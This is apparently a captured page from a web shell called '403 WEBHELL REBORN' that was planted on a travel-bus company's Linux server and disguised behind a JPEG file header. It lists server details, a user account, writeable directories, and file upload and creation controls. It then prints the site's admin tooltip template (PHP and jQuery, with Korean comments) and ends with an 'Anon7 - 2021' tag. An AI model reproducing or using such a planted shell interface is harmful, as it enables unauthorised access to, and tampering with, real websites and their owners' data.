ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : tkt_travelbus ( 1137)
PHP Version : 7.0.0p1
Disable Function : mysql_pconnect
Directory :  /tkt_travelbus/www/admin/include/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /tkt_travelbus/www/admin/include/footer_iframe.html
</body>


<!-- 풍선도움말 -->
<!-- 수정하는 경우에 ../include/footer.html ../include/footer_proc.html ../include/footer_iframe.html 같이 수정함.-->
<script type="text/javascript">

$(document).ready(function(){
	var tooltip_array = new Array();
		
	<?php
		for($i=0 ; $i<count($tooltip_data) ; $i++)
		{
			$row = $tooltip_data[$i];
	?>
		tooltip_array[<?=$i?>] = {"help_title":"<?=$row['help_title']?>","idx":"<?=$row['idx']?>","help_seq":"<?=$row['help_seq']?>"};
	<?php
		}
	?>


	$(".help_tooltip").each(function(){
		var title = $(this).html();

		for(var n in tooltip_array)
		{
			if ( title.indexOf(tooltip_array[n].help_title) >= 0 )
			{
				$(this).attr('tooltip_id','tooltip_cont_'+tooltip_array[n].idx+"_"+tooltip_array[n].help_seq);
				$(this).attr('idx',tooltip_array[n].idx);
			}
		}

	});
});
</script>

<?php
	for($i=0 ; $i<count($tooltip_data) ; $i++)
	{
		$row = $tooltip_data[$i];
?>
<div id="tooltip_cont_<?=$row['idx']?>_<?=$row['help_seq']?>" style="display:none;">
	<?=$row['help_cont2']?>
</div>
<?
	}
?>
<!-- /풍선도움말 -->
</html>

Anon7 - 2021